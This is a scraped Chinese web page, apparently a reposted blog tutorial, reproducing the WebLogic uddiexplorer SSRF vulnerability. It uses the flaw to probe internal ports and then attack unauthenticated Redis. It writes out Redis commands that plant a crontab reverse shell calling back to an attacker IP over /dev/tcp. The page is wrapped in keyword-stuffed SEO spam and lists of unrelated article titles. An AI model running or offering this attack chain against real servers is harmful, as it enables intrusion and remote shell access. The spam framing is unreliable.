当前位置: 首页 > wzjs >正文

做秒杀网站网站优化排名金苹果下拉

做秒杀网站,网站优化排名金苹果下拉,做国际贸易如何建网站,二级医院做网站漏洞概述: Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 漏洞形成原因: WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicR…

漏洞概述:

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

漏洞形成原因:

WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicRegistries.jsp 文件。该文件允许用户输入外部 URL,但未对输入的 URL 进行严格的过滤和验证,导致攻击者可以利用此功能发起任意 HTTP 请求

影响范围:

weblogic 版本10.0.2--10.3.6

复现

1,访问7001这样就是搭建成功了

2,在url处访问ip:7001/uddiexplorer/,可查看uddiexplorer应用

3,漏洞位置存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp,在表单中随意输入内容使用burp抓包,发送到重放模块

4,可以看到数据包有一个url,我们通过更改进行测试

5, 当访问一个可用端口时,会收到一个带有状态码的错误响应。如果访问的是非HTTP协议,则会返回"did not have a valid SOAP content-type"错误。

6,当访问一个不存在的端口时,响应会显示"could not connect over HTTP to server"。

7, 我们通过命令进入容器里面获取ip地址

docker exec -it 32da04e35583 /bin/bash

netstat -tuln

8,然后通过ssrf探测端口,发现了6379,存在redis未授权, 将反弹 shell 的脚本写入目录/etc/crontab(这个目录下是一个默认自动执行的一些 crontab 定时服务命令,里面都写的是一些开启服务的命令)

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/192.168.43.133/6666 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

http://www.dtcms.com/wzjs/166742.html

相关文章:

  • 宿迁企业网站建设附近的教育培训机构有哪些
  • 高端网站优化成都网站seo费用
  • 书香气的域名做网站重庆网站建设外包
  • 模板网站建设开发google推广怎么做
  • wordpress二维码活码旅游企业seo官网分析报告
  • 网站建设第一步怎么弄现在广告行业好做吗
  • 请教个人主页网站怎么做啊百度站长工具seo查询
  • 卷帘门怎么做网站网页
  • 诺尔诺达网站建设百度网盟
  • 平台型网站如何推广学历提升哪个教育机构好一些
  • 专业做蛋糕的网站今日头条新闻手机版
  • 直播网站建设需要什么软件培训心得体会500字
  • 网站提高内容的丰富度创意怎么在百度上添加自己的店铺地址
  • 如何让网站快速被收录成人营销管理培训班
  • 做市级网站需要什么找做网站的公司
  • 做网站的把网站写成一行百度广告收费
  • 网页设计实训报告的目的网站优化是做什么的
  • 宿迁做网站哪家好宁波seo外包服务
  • 网站怎么申请微信支付seo排名首页
  • 国际贸易网站排名技能培训网站
  • 谷歌seo怎么提高网站权重竞价运营是做什么的
  • 简述网站开发岗位及职务日照seo优化
  • 怎么做网站的图片关键词工具软件
  • 建设专业网站哪家比较好网站收录量是什么意思
  • 做网站把自己做死中企动力做网站推广靠谱吗
  • 简述网站建设网站seo资讯
  • 重庆巴南网站制作seo应该如何做
  • 临朐整站优化seo专业技术培训
  • 怎么做网站上面的那种卡通图片推广产品引流的最佳方法
  • 软件开发项目验收报告武汉seo收费